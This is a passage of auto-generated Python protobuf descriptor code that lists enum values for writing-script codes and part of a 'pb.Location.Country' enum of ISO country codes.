_descriptor.EnumValueDescriptor(
name='Goth', index=48, number=48,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Gran', index=49, number=49,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Grek', index=50, number=50,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Gujr', index=51, number=51,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Guru', index=52, number=52,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hanb', index=53, number=53,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hang', index=54, number=54,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hani', index=55, number=55,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hano', index=56, number=56,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hans', index=57, number=57,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hant', index=58, number=58,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hatr', index=59, number=59,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hebr', index=60, number=60,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hira', index=61, number=61,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hluw', index=62, number=62,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hmng', index=63, number=63,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hmnp', index=64, number=64,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hrkt', index=65, number=65,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Hung', index=66, number=66,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Inds', index=67, number=67,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Ital', index=68, number=68,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Jamo', index=69, number=69,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Java', index=70, number=70,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Jpan', index=71, number=71,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Jurc', index=72, number=72,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kali', index=73, number=73,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kana', index=74, number=74,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Khar', index=75, number=75,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Khmr', index=76, number=76,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Khoj', index=77, number=77,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kitl', index=78, number=78,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kits', index=79, number=79,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Knda', index=80, number=80,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kore', index=81, number=81,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kpel', index=82, number=82,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Kthi', index=83, number=83,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Lana', index=84, number=84,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Laoo', index=85, number=85,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Latf', index=86, number=86,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Latg', index=87, number=87,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Latn', index=88, number=88,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Leke', index=89, number=89,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Lepc', index=90, number=90,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Limb', index=91, number=91,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Lina', index=92, number=92,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Linb', index=93, number=93,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Lisu', index=94, number=94,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Loma', index=95, number=95,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Lyci', index=96, number=96,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Lydi', index=97, number=97,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mahj', index=98, number=98,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Maka', index=99, number=99,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mand', index=100, number=100,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mani', index=101, number=101,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Marc', index=102, number=102,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Maya', index=103, number=103,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Medf', index=104, number=104,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mend', index=105, number=105,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Merc', index=106, number=106,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mero', index=107, number=107,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mlym', index=108, number=108,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Modi', index=109, number=109,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mong', index=110, number=110,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Moon', index=111, number=111,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mroo', index=112, number=112,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mtei', index=113, number=113,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mult', index=114, number=114,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Mymr', index=115, number=115,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Nand', index=116, number=116,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Narb', index=117, number=117,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Nbat', index=118, number=118,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Newa', index=119, number=119,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Nkdb', index=120, number=120,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Nkgb', index=121, number=121,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Nkoo', index=122, number=122,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Nshu', index=123, number=123,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Ogam', index=124, number=124,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Olck', index=125, number=125,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Orkh', index=126, number=126,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Orya', index=127, number=127,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Osge', index=128, number=128,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Osma', index=129, number=129,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Palm', index=130, number=130,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Pauc', index=131, number=131,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Perm', index=132, number=132,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Phag', index=133, number=133,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Phli', index=134, number=134,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Phlp', index=135, number=135,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Phlv', index=136, number=136,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Phnx', index=137, number=137,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Plrd', index=138, number=138,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Piqd', index=139, number=139,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Prti', index=140, number=140,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Qaaa', index=141, number=141,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Qabx', index=142, number=142,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Rjng', index=143, number=143,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Rohg', index=144, number=144,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Roro', index=145, number=145,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Runr', index=146, number=146,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Samr', index=147, number=147,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sara', index=148, number=148,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sarb', index=149, number=149,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Saur', index=150, number=150,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sgnw', index=151, number=151,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Shaw', index=152, number=152,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Shrd', index=153, number=153,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Shui', index=154, number=154,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sidd', index=155, number=155,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sind', index=156, number=156,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sinh', index=157, number=157,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sogd', index=158, number=158,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sogo', index=159, number=159,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sora', index=160, number=160,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Soyo', index=161, number=161,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sund', index=162, number=162,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Sylo', index=163, number=163,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Syrc', index=164, number=164,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Syre', index=165, number=165,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Syrj', index=166, number=166,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Syrn', index=167, number=167,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tagb', index=168, number=168,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Takr', index=169, number=169,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tale', index=170, number=170,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Talu', index=171, number=171,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Taml', index=172, number=172,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tang', index=173, number=173,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tavt', index=174, number=174,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Telu', index=175, number=175,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Teng', index=176, number=176,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tfng', index=177, number=177,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tglg', index=178, number=178,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Thaa', index=179, number=179,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Thai', index=180, number=180,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tibt', index=181, number=181,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Tirh', index=182, number=182,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Ugar', index=183, number=183,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Vaii', index=184, number=184,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Visp', index=185, number=185,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Wara', index=186, number=186,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Wcho', index=187, number=187,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Wole', index=188, number=188,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Xpeo', index=189, number=189,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Xsux', index=190, number=190,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Yiii', index=191, number=191,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zanb', index=192, number=192,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zinh', index=193, number=193,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zmth', index=194, number=194,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zsye', index=195, number=195,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zsym', index=196, number=196,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zxxx', index=197, number=197,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zyyy', index=198, number=198,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Zzzz', index=199, number=199,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=3112,
serialized_end=5202,
)
_sym_db.RegisterEnumDescriptor(_LANGUAGE_SCRIPT)
_LOCATION_COUNTRY = _descriptor.EnumDescriptor(
name='Country',
full_name='pb.Location.Country',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN_COUNTRY', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AF', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AX', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AL', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DZ', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AS', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AD', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AO', index=7, number=7,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AI', index=8, number=8,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AQ', index=9, number=9,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AG', index=10, number=10,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AR', index=11, number=11,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AM', index=12, number=12,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AW', index=13, number=13,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AU', index=14, number=14,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AT', index=15, number=15,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AZ', index=16, number=16,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BS', index=17, number=17,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BH', index=18, number=18,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BD', index=19, number=19,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BB', index=20, number=20,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BY', index=21, number=21,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BE', index=22, number=22,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BZ', index=23, number=23,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BJ', index=24, number=24,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BM', index=25, number=25,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BT', index=26, number=26,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BO', index=27, number=27,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BQ', index=28, number=28,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BA', index=29, number=29,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BW', index=30, number=30,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BV', index=31, number=31,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BR', index=32, number=32,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IO', index=33, number=33,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BN', index=34, number=34,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BG', index=35, number=35,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BF', index=36, number=36,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BI', index=37, number=37,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KH', index=38, number=38,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CM', index=39, number=39,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CA', index=40, number=40,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CV', index=41, number=41,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KY', index=42, number=42,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CF', index=43, number=43,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TD', index=44, number=44,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CL', index=45, number=45,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CN', index=46, number=46,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CX', index=47, number=47,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CC', index=48, number=48,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CO', index=49, number=49,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KM', index=50, number=50,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CG', index=51, number=51,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CD', index=52, number=52,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CK', index=53, number=53,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CR', index=54, number=54,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CI', index=55, number=55,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HR', index=56, number=56,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CU', index=57, number=57,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CW', index=58, number=58,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CY', index=59, number=59,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CZ', index=60, number=60,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DK', index=61, number=61,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DJ', index=62, number=62,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DM', index=63, number=63,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DO', index=64, number=64,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EC', index=65, number=65,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EG', index=66, number=66,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SV', index=67, number=67,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GQ', index=68, number=68,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ER', index=69, number=69,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EE', index=70, number=70,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ET', index=71, number=71,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FK', index=72, number=72,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FO', index=73, number=73,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FJ', index=74, number=74,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FI', index=75, number=75,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FR', index=76, number=76,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GF', index=77, number=77,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PF', index=78, number=78,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TF', index=79, number=79,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GA', index=80, number=80,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GM', index=81, number=81,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GE', index=82, number=82,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DE', index=83, number=83,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GH', index=84, number=84,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GI', index=85, number=85,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GR', index=86, number=86,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GL', index=87, number=87,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GD', index=88, number=88,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GP', index=89, number=89,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GU', index=90, number=90,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GT', index=91, number=91,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GG', index=92, number=92,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GN', index=93, number=93,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GW', index=94, number=94,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GY', index=95, number=95,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HT', index=96, number=96,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HM', index=97, number=97,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VA', index=98, number=98,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HN', index=99, number=99,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HK', index=100, number=100,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HU', index=101, number=101,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IS', index=102, number=102,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IN', index=103, number=103,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ID', index=104, number=104,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IR', index=105, number=105,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IQ', index=106, number=106,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IE', index=107, number=107,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IM', index=108, number=108,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IL', index=109, number=109,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IT', index=110, number=110,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='JM', index=111, number=111,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='JP', index=112, number=112,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='JE', index=113, number=113,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='JO', index=114, number=114,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KZ', index=115, number=115,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KE', index=116, number=116,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KI', index=117, number=117,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KP', index=118, number=118,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KR', index=119, number=119,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KW', index=120, number=120,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KG', index=121, number=121,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LA', index=122, number=122,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LV', index=123, number=123,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LB', index=124, number=124,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LS', index=125, number=125,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LR', index=126, number=126,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LY', index=127, number=127,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LI', index=128, number=128,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LT', index=129, number=129,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LU', index=130, number=130,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MO', index=131, number=131,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MK', index=132, number=132,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MG', index=133, number=133,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MW', index=134, number=134,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MY', index=135, number=135,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MV', index=136, number=136,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ML', index=137, number=137,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MT', index=138, number=138,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MH', index=139, number=139,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MQ', index=140, number=140,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MR', index=141, number=141,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MU', index=142, number=142,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='YT', index=143, number=143,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MX', index=144, number=144,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FM', index=145, number=145,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MD', index=146, number=146,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MC', index=147, number=147,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MN', index=148, number=148,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ME', index=149, number=149,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MS', index=150, number=150,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MA', index=151, number=151,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MZ', index=152, number=152,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MM', index=153, number=153,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NA', index=154, number=154,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NR', index=155, number=155,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NP', index=156, number=156,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NL', index=157, number=157,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NC', index=158, number=158,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NZ', index=159, number=159,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NI', index=160, number=160,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NE', index=161, number=161,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NG', index=162, number=162,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NU', index=163, number=163,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NF', index=164, number=164,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MP', index=165, number=165,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NO', index=166, number=166,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='OM', index=167, number=167,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PK', index=168, number=168,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PW', index=169, number=169,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PS', index=170, number=170,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PA', index=171, number=171,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PG', index=172, number=172,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PY', index=173, number=173,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PE', index=174, number=174,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PH', index=175, number=175,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PN', index=176, number=176,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PL', index=177, number=177,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PT', index=178, number=178,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PR', index=179, number=179,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='QA', index=180, number=180,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RE', index=181, number=181,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RO', index=182, number=182,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RU', index=183, number=183,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RW', index=184, number=184,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BL', index=185, number=185,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SH', index=186, number=186,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KN', index=187, number=187,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LC', index=188, number=188,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MF', index=189, number=189,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PM', index=190, number=190,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VC', index=191, number=191,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WS', index=192, number=192,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SM', index=193, number=193,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ST', index=194, number=194,
options=None,
type=None),
